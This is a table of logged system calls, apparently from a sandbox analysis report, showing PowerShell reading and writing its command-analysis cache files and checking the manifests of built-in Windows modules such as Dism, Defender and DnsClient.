| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5713a0d6-d10b-4b74-9a40-4d532ad03618, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5713a0d6-d10b-4b74-9a40-4d532ad03618, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5713a0d6-d10b-4b74-9a40-4d532ad03618, size = 4096, size_out = 3723 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache\BranchCache.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8b9e900-0989-431a-88c5-32335c6c413f, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8b9e900-0989-431a-88c5-32335c6c413f, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8b9e900-0989-431a-88c5-32335c6c413f, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8b9e900-0989-431a-88c5-32335c6c413f, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8b9e900-0989-431a-88c5-32335c6c413f, size = 3, size_out = 3 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8b9e900-0989-431a-88c5-32335c6c413f, size = 4096, size_out = 3844 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70ef2992-2518-42eb-ad6f-f6d2b834087e, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70ef2992-2518-42eb-ad6f-f6d2b834087e, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70ef2992-2518-42eb-ad6f-f6d2b834087e, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70ef2992-2518-42eb-ad6f-f6d2b834087e, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70ef2992-2518-42eb-ad6f-f6d2b834087e, size = 25, size_out = 25 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70ef2992-2518-42eb-ad6f-f6d2b834087e, size = 4096, size_out = 2543 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Defender\Defender.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a0f47a5b-3971-44a5-bd40-01241883a431, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a0f47a5b-3971-44a5-bd40-01241883a431, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a0f47a5b-3971-44a5-bd40-01241883a431, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a0f47a5b-3971-44a5-bd40-01241883a431, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a0f47a5b-3971-44a5-bd40-01241883a431, size = 4096, size_out = 135 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_64f9e75e-6fc7-41b7-be7a-7c9fe8ff921f, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_64f9e75e-6fc7-41b7-be7a-7c9fe8ff921f, type = size, size_out = 0 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Modules.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Modules.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Modules.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Modules.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, size = 4096, size_out = 1924 |
|
1 | |
| File | Read | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, size = 124, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\en-US\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\en\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.Types.ps1xml, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.Format.ps1xml, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Microsoft.Dism.PowerShell.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_475e4689-74ef-43e7-90fe-d79deb0624b6, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_475e4689-74ef-43e7-90fe-d79deb0624b6, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_475e4689-74ef-43e7-90fe-d79deb0624b6, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_475e4689-74ef-43e7-90fe-d79deb0624b6, size = 4096, size_out = 3064 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 41, size_out = 41 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 2942 |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, size = 4096 |
|
2 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, size = 1026 |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 2983 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 41, size_out = 41 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 2942 |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, size = 3, size_out = 3 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, size = 1, size_out = 1 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d8ab723-44d5-4795-947e-d5b7229dfa98, size = 4096, size_out = 1022 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_600154a2-5b63-48f9-943c-f8e123360163, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_600154a2-5b63-48f9-943c-f8e123360163, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_600154a2-5b63-48f9-943c-f8e123360163, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_600154a2-5b63-48f9-943c-f8e123360163, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_600154a2-5b63-48f9-943c-f8e123360163, size = 4096, size_out = 1238 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\International\International.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3dea8a0-8c87-4f9b-9a1c-300ad32616da, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3dea8a0-8c87-4f9b-9a1c-300ad32616da, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3dea8a0-8c87-4f9b-9a1c-300ad32616da, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3dea8a0-8c87-4f9b-9a1c-300ad32616da, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3dea8a0-8c87-4f9b-9a1c-300ad32616da, size = 1, size_out = 1 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3dea8a0-8c87-4f9b-9a1c-300ad32616da, size = 4096, size_out = 1513 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
